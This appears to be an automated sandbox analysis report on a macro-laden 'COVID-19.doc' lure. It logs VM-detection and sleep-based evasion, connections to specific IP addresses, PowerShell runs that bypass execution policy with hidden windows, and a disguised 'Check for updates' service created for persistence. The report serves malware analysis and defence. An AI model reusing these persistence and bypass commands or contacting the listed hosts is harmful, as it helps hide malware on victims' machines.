Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Found evasive API chain (may stop execution after checking mutex)Show sources
Source: C:\Windows\SysWOW64\svchost.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_17-958
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: COVID-19.docStream path 'Macros/VBA/ThisDocument' : found possibly 'ActiveDocument.Name' functions activedocument.name
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, found possibly 'ActiveDocument.Name' functions activedocument.nameName: Document_Open
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1556Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3107Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3050Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2366Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4578Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3951Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_17-986
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2228Thread sleep time: -10145709240540247s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1020Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2224Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6112Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2628Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exe TID: 5776Thread sleep count: 75 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4800Thread sleep count: 4578 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4800Thread sleep count: 3951 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4424Thread sleep time: -5534023222112862s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5700Thread sleep count: 76 > 30
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
Source: powershell.exe, 00000002.00000002.706677063.0000000005224000.00000004.00000001.sdmpBinary or memory string: Hyper-V
Source: wscript.exe, 00000001.00000002.658435453.0000000005F80000.00000002.00000001.sdmp, sc.exe, 00000008.00000002.781619631.0000000003430000.00000002.00000001.sdmp, sc.exe, 0000000C.00000002.786854620.0000000000970000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: powershell.exe, 00000004.00000003.765309047.00000000079B1000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.929256468.0000018322055000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: wscript.exe, 00000001.00000002.658435453.0000000005F80000.00000002.00000001.sdmp, sc.exe, 00000008.00000002.781619631.0000000003430000.00000002.00000001.sdmp, sc.exe, 0000000C.00000002.786854620.0000000000970000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000001.00000002.658435453.0000000005F80000.00000002.00000001.sdmp, sc.exe, 00000008.00000002.781619631.0000000003430000.00000002.00000001.sdmp, sc.exe, 0000000C.00000002.786854620.0000000000970000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: powershell.exe, 00000002.00000002.706677063.0000000005224000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.793857324.0000000004794000.00000004.00000001.sdmpBinary or memory string: c:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: wscript.exe, 00000001.00000002.658435453.0000000005F80000.00000002.00000001.sdmp, sc.exe, 00000008.00000002.781619631.0000000003430000.00000002.00000001.sdmp, sc.exe, 0000000C.00000002.786854620.0000000000970000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end nodegraph_17-923
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_004C1A2F LoadLibraryA,GetProcAddress,17_2_004C1A2F
Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_004C26BA mov eax, dword ptr fs:[00000030h]17_2_004C26BA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 216.239.32.21 80
Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 78.141.194.181 80Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 45.67.229.125 80
Bypasses PowerShell execution policyShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File 'C:\Users\user\Desktop\COVID-19.ps1' -adminRights 1
Contains functionality to change the desktop window for a process (likely to hide graphical interactions)Show sources
Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_004C2BAB OpenWindowStationA,GetProcessWindowStation,SetProcessWindowStation,OpenInputDesktop,GetCurrentThreadId,GetThreadDesktop,SetThreadDesktop,GetDesktopWindow,GetWindowDC,CreateCompatibleDC,GetWindowRect,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,17_2_004C2BAB
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ex bypass -win hid -f C:\Users\user\Desktop\COVID-19.ps1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File 'C:\Users\user\Desktop\COVID-19.ps1' -adminRights 1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C sc delete checkupdateJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C sc create checkupdate binpath= '%COMSPEC% /C start %COMSPEC% /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1' start= delayed-auto DisplayName= 'Check for updates'Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C sc start checkupdateJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc delete checkupdateJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create checkupdate binpath= 'C:\Windows\system32\cmd.exe /C start C:\Windows\system32\cmd.exe /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1' start= delayed-auto DisplayName= 'Check for updates'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc start checkupdateJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe -k netsvcsJump to behavior
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C sc create checkupdate binpath= '%COMSPEC% /C start %COMSPEC% /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1' start= delayed-auto DisplayName= 'Check for updates'
Source: unknownProcess created: C:\Windows\SysWOW64\sc.exe sc create checkupdate binpath= 'C:\Windows\system32\cmd.exe /C start C:\Windows\system32\cmd.exe /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1' start= delayed-auto DisplayName= 'Check for updates'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C sc create checkupdate binpath= '%COMSPEC% /C start %COMSPEC% /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1' start= delayed-auto DisplayName= 'Check for updates'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create checkupdate binpath= 'C:\Windows\system32\cmd.exe /C start C:\Windows\system32\cmd.exe /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1' start= delayed-auto DisplayName= 'Check for updates'Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
